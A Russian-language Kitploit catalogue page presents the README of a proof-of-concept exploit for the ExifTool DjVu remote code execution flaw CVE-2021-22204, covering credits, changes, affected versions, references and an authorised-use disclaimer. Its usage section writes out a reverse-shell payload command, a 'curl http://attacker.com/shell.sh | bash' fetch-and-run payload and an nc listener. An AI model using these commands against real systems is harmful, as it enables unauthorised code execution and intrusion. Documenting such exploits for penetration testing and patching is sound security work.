Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-22204 — ExifTool RCE exploit (CVE-2021-22204) - улучшенная версия, без зависимости от exiftool | Kitploit
Инструменты/GitHubGitHub/d4ytox/cve-2021-22204
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubd4ytox/cve-2021-22204

CVE-2021-22204

ExifTool RCE exploit (CVE-2021-22204) - улучшенная версия, без зависимости от exiftool

Репозиторий
181 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-22204 — Выполнение произвольного кода в ExifTool

Улучшенный proof-of-concept для CVE-2021-22204 — уязвимости в ExifTool версий с 7.44 по 12.23, которая позволяет выполнять произвольный код при обработке вредоносных файлов DjVu.

Авторство

Это производная работа. Уязвимость и оригинальный эксплойт принадлежат не мне.

РольКто
Уязвимость обнаруженаWilliam Bowling (@wcbowling), сообщено через программу bug bounty GitLab — апрель 2021
Оригинальный PoCUNICORD (NicPWNs & Dev-Yeoj)
Изменения в этом репозиторииd4ytox

Описание

Некорректная нейтрализация пользовательских данных в формате файлов DjVu в ExifTool версий с 7.44 по 12.23 позволяет выполнять произвольный код при разборе вредоносного изображения. Этот эксплойт генерирует вредоносный файл изображения, который при обработке уязвимой версией ExifTool выполняет код, контролируемый атакующим.

Что меняет эта версия

На основе UNICORDev/exploit-CVE-2021-22204:

  • Нет зависимости от ExifTool на машине атакующего — оригинал использует exiftool -config для внедрения полезной нагрузки, что не работает, если ваш собственный ExifTool пропатчен (v12.24+). Эта версия создаёт чистую полезную нагрузку DjVu, используя только djvumake.
  • Работает на современном Kali — совместимо с Python 3.12+ (исправлено предупреждение об escape-последовательности \c)
  • Минимальные зависимости — требуется только пакет djvulibre-bin
  • Чистый, минималистичный код — без ASCII-арта и искусственных задержек

Это инженерные изменения существующего эксплойта. Исследование уязвимостей не заявляется.

Требования

sudo apt install djvulibre-bin

Использование

Обратная оболочка (reverse shell):

python3 exploit.py -s <LHOST> <LPORT>

Произвольная команда:

python3 exploit.py -c "id > /tmp/pwned"

Примеры:

# Сгенерировать полезную нагрузку обратной оболочки
python3 exploit.py -s 192.168.1.100 4444

# Сгенерировать полезную нагрузку выполнения команды  
python3 exploit.py -c "curl http://attacker.com/shell.sh | bash"

# Запустить слушатель и ожидать обратного вызова
nc -nlvp 4444

Эксплойт генерирует image.jpg — загрузите его на цель, где ExifTool обработает этот файл.

Затронутые версии

  • ExifTool 7.44 — 12.23

Ссылки

  • Запись в NVD — CVE-2021-22204
  • Оригинальный отчёт William Bowling — HackerOne #1154542
  • Уведомление ExifTool
  • Коммит с исправлением ExifTool
  • Оригинальный PoC — UNICORDev/exploit-CVE-2021-22204

Отказ от ответственности

Этот инструмент предоставляется только для образовательных целей и авторизованного тестирования безопасности.

Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом. Используйте этот эксплойт только против систем, которыми вы владеете или на тестирование которых имеете явное письменное разрешение.

Несанкционированный доступ к компьютерным системам незаконен и наказывается по закону. Используйте ответственно.

Лицензия

MIT, применяется только к изменениям в этом репозитории. Вышестоящий PoC не имеет лицензии, поэтому все права на него остаются за его авторами. См. LICENSE для полного уведомления об авторстве.

Скачать инструмент